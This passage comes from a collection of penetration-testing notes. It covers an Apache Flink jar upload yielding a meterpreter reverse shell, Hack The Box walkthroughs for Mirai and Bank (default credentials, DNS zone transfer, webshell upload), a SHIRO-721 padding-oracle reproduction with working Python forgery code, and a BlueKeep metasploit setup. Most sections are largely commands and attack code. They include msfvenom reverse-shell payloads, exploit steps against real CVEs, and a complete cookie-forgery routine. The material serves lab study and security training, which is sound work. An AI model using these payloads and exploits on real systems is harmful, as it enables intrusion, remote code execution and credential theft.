    msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar -o shell.jar

Start a matching listener in msf (the handler payload must be the one the jar was built with):

    use exploit/multi/handler
    set payload java/meterpreter/reverse_tcp
    set LHOST IP
    set LPORT 4444
    exploit

Upload shell.jar in the dashboard and submit it; the meterpreter session comes back.

Remediation

Upgrade Apache Flink to the latest version.
22. Hack The Box: Mirai

Information gathering

nmap:

    nmap -T4 -A -v 10.10.10.48

Result: TCP ports 22, 53 and 80 are open. Port 80 serves a blank page.

Directory brute force:

    python3 dirsearch.py -u http://10.10.10.48/ -e html -t 20

Result: an admin directory. Visiting it and researching the service shows it runs on a Raspberry Pi.

Exploitation

Try the Raspberry Pi default credentials over SSH:

    ssh pi@10.10.10.48

The login succeeds. cat /home/pi/user.txt gives the first flag.

sudo -l shows that every command can be run without a password, so sudo su switches straight to root. cat /root/root.txt does not give the flag directly; the note it contains points to a USB stick, so check which devices are mounted:

    df -lh

/dev/sdb is mounted at /media/stick.

Method 1

Dump every printable string on the raw device; a deleted file's contents are still on disk:

    strings /dev/sdb

One string looks like a flag and is accepted on submission.

Method 2

Image the USB device with dcfldd:

    dcfldd if=/dev/sdb of=/home/pi/usb.dd

Analyze the image:

    binwalk usb.dd

Three files are found. Extract them:

    binwalk -Me usb.dd

Viewing the extracted file gives the flag.
23. Hack The Box: Bank

Information gathering

nmap:

    nmap -T4 -A -v 10.10.10.29

TCP ports 22, 53 and 80 are open, with DNS on port 53. DNS normally answers on UDP 53; a DNS server listening on TCP is usually there for zone transfers, so a zone-transfer misconfiguration is suspected. Port 80 shows the default Apache page; a host that runs DNS and serves a default page on its bare IP is probably using name-based virtual hosts.

DNS enumeration

Queries for localhost and 10.10.10.29 returned nothing useful. Guessing bank.htb (found only after reading a write-up) worked: the DNS server resolves the name, so dig was used for further testing:

    dig axfr bank.htb @10.10.10.29

The zone transfer succeeds and lists the subdomains of bank.htb.

Vulnerability discovery

Point the attacking machine's DNS at 10.10.10.29 and browse to www.bank.htb. Then brute-force directories with dirsearch: it finds an uploads directory, index.php and support.php. index.php and support.php have different page sizes but both 302-redirect to login.php, which suggests they hide something. Using Burp Suite to rewrite the response and change the 302 to a 200 shows the content of index.php and support.php. support.php has an upload point, but its restrictions could not be bypassed, so testing continued. Directory brute forcing also found balance-transfer; the files in it look like encrypted logs, so the plan is to find one whose encryption failed and recover a plaintext username and password.
Download all the files:

    wget -r http://www.bank.htb/balance-transfer

In the balance-transfer directory, delete index.html* and the other non-log files and sort by size:

    wc -c *.acc | sort -n

One file is noticeably smaller than the rest; it contains the plaintext credentials. Log in with them: the upload page appears again (it is the earlier support.php). Viewing the page source reveals a feature left over from debugging. Upload the webshell as xxx.htb and connect with China Chopper. user.txt gives the first flag.

whoami shows a low-privilege user, so privilege escalation is needed. Upload LinEnum.sh and run it to gather information.
24. Apache Shiro padding oracle attack reproduction

Shiro encrypts the rememberMe cookie with AES-128-CBC. Because the server reveals whether the padding of a tampered cookie was valid, an attacker holding any valid rememberMe cookie can mount a padding oracle attack and forge ciphertext whose plaintext is attacker-chosen serialized data, which Shiro then deserializes. The earlier SHIRO-550 issue was also a rememberMe cookie problem.

Environment setup

Shiro sample package: https://github.com/jas502n/SHIRO-721
exp: https://github.com/Geekby/shiro_rce_exp
Environment: ubuntu16.04 + tomcat8 + shiro 1.4.1

    apt-get install tomcat8 tomcat8-docs tomcat8-examples tomcat8-admin

Deploy the downloaded samples-web-1.4.1.war to tomcat.

Reproduction

1. Visit the Shiro login page.
2. Enter a username and password and tick Remember Me.
3. Visit any page and copy the rememberMe value from the cookie.
4. Generate the Java class payload.
5. Run the exp to obtain the forged cookie produced by the padding oracle attack. Note: this is slow, roughly 100 to 120 minutes, because every oracle query is an HTTP request.
6. Put the forged cookie into a request and replay it.
7. Check the result: the success file is created, so commands execute.

References
https://www.anquanke.com/post/id/192819
https://github.com/jas502n/SHIRO-721
https://github.com/wuppp/shiro_rce_exp
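What the exp does during those two hours is a CBC padding oracle used not to decrypt but to forge. The Python below is an added example, not the exp's or Shiro's code. To run without third-party libraries it stands a toy Feistel construction built from SHA-256 in for AES-128; the attack itself is cipher-agnostic and needs only the one bit the server leaks, "was the padding valid", which the Server class models. The payload bytes are a placeholder, not a real serialized object.

```python
"""CBC padding-oracle forgery, the primitive behind the SHIRO-721 rememberMe attack."""
import hashlib
import os

BLOCK = 16
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, r: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    """Inverse of a 4-round 128-bit Feistel cipher; a stand-in for AES, not secure."""
    left, right = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = _xor(right, _f(key, r, left)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    """data = IV || C1 || ... || Cn, like a base64-decoded rememberMe value."""
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    out, prev = b"", data[:BLOCK]
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(toy_decrypt_block(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return pkcs7_unpad(out)


class Server:
    """Server side: holds the key and leaks one bit per request, whether padding was valid.
    In Shiro that bit is whether the response sets a rememberMe=deleteMe cookie."""
    def __init__(self):
        self.key = os.urandom(16)
        self.queries = 0

    def padding_ok(self, cookie: bytes) -> bool:
        self.queries += 1
        try:
            cbc_decrypt(self.key, cookie)
            return True
        except ValueError:
            return False


def recover_intermediate(oracle, block: bytes) -> bytes:
    """Recover D_key(block) one byte at a time, last byte first, using only the oracle."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            probe[j] = inter[j] ^ pad  # bytes already known are forced to the pad value
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe) + block):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be a longer valid pad (e.g. 02 02): disturb the
                # byte before it and require the padding to stay valid before accepting 01.
                probe[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(probe) + block)
                probe[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no guess; is it really a padding oracle?")
    return bytes(inter)


def forge(oracle, plaintext: bytes) -> bytes:
    """Build IV || C1..Cn that decrypts to plaintext under the server's key, working back
    from a random last block: C_{i-1} = D(C_i) xor P_i, and finally IV = D(C_1) xor P_1."""
    padded = pkcs7_pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    current = os.urandom(BLOCK)  # the last ciphertext block can be anything
    forged = current
    for p in reversed(blocks):
        current = _xor(recover_intermediate(oracle, current), p)
        forged = current + forged
    return forged


def demo(payload: bytes = b"<attacker-chosen serialized object bytes>") -> tuple:
    """Forge a cookie without the key; return (decrypts to payload?, oracle queries used)."""
    server = Server()
    cookie = forge(server.padding_ok, payload)
    return cbc_decrypt(server.key, cookie) == payload, server.queries


if __name__ == "__main__":
    ok, queries = demo()
    print("forgery decrypts correctly:", ok, "oracle queries:", queries)
```

Each plaintext block costs up to 256 oracle queries per byte, which is why the real attack takes hours of HTTP requests against a Shiro instance. This is also why step 3 above needs a captured valid cookie: the exp prepends it to the forged blocks, so that when the padding is valid the original principals deserialize cleanly (Java ignores trailing bytes after the first object), and when it is not, Shiro answers with deleteMe.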
25. CVE-2019-0708 remote desktop code execution reproduction

Environment

Target IP: 172.16.105.129
Attacker IP: 172.16.105.1

Windows 7 SP1 was installed with VMware Fusion on a Mac.
Windows 7 SP1 download: ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Note: the exploit currently supports only specific system versions; other builds may not be exploitable.

Enable Remote Desktop on the Windows 7 target.

msf preparation

Download the attack suite from https://github.com/rapid7/metasploit-framework/pull/12283/files and place the files into the corresponding msf folders (overwrite existing files with the same name):

    rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Exploitation

Start msfconsole and run reload_all so the new modules are loaded. Then:

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    show options

Using the default shell payload: fill in the options and run the exploit.

Using a meterpreter shell: same steps with a meterpreter payload.

Note: reboot the target between two attempts, otherwise the attack fails.
